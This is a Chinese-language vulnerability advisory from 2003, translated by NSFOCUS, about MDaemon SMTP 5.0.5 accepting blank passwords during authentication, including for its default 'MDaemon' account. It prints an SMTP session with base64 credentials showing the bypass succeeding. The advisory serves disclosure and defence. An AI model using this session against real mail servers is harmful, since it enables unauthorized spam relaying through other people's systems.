安全研究

安全漏洞
MDaemon SMTP Server默认空口令验证漏洞

发布日期:2003-08-09
更新日期:2003-08-14

受影响系统:
Deerfield MDaemon 5.0.5
    - Microsoft Windows XP Home
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows NT 4.0 SP2
    - Microsoft Windows NT 4.0 SP1
    - Microsoft Windows NT 4.0
    - Microsoft Windows ME
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000 Professional SP2
    - Microsoft Windows 2000 Professional SP1
    - Microsoft Windows 2000 Professional
描述:
BUGTRAQ  ID: 8382

MDaemon是一款集成可扩展的SMTP、POP3和IMAP4,支持LDAP,集成基于浏览器EMAIL客户端,可以进行内容过滤,恶意邮件阻挡等功能的邮件服务系统。

MDaemon SMTP服务的授权验证发信处理程序存在问题,远程攻击者可以利用这个漏洞利用此服务发送任意垃圾邮件。

只要拥有合法用户名或者帐户,攻击者就可以使用空口令利用MDaemon SMTP服务进行邮件发送,并且MDaemon系统包含默认'MDaemon'帐户,因此攻击者可以利用这些服务器任意发送垃圾邮件。

<*来源:Buckaroo Banzai (buckaner0@terra.es
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=106044908232349&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Buckaroo Banzai (buckaner0@terra.es)提供了如下测试方法:

220 xxx.com ESMTP MDaemon 5.0.5; Sat, 02 Aug 2003 00:51:06 +0200
EHLO localhost
250-xxx.com Hello localhost, pleased to meet you
250-ETRN
250-AUTH LOGIN CRAM-MD5
250-8BITMIME
250 SIZE 0
AUTH LOGIN
334 VXNlcm5hbWU6 (334 Username:)
TURhZW1vbg== (MDaemon)
334 UGFzc3dvcmQ6 (334 Password:)
(blank password)
235 Authentication successful

建议:
厂商补丁:

Deerfield
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.deerfield.com/products/mdaemon/

浏览次数:3973
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障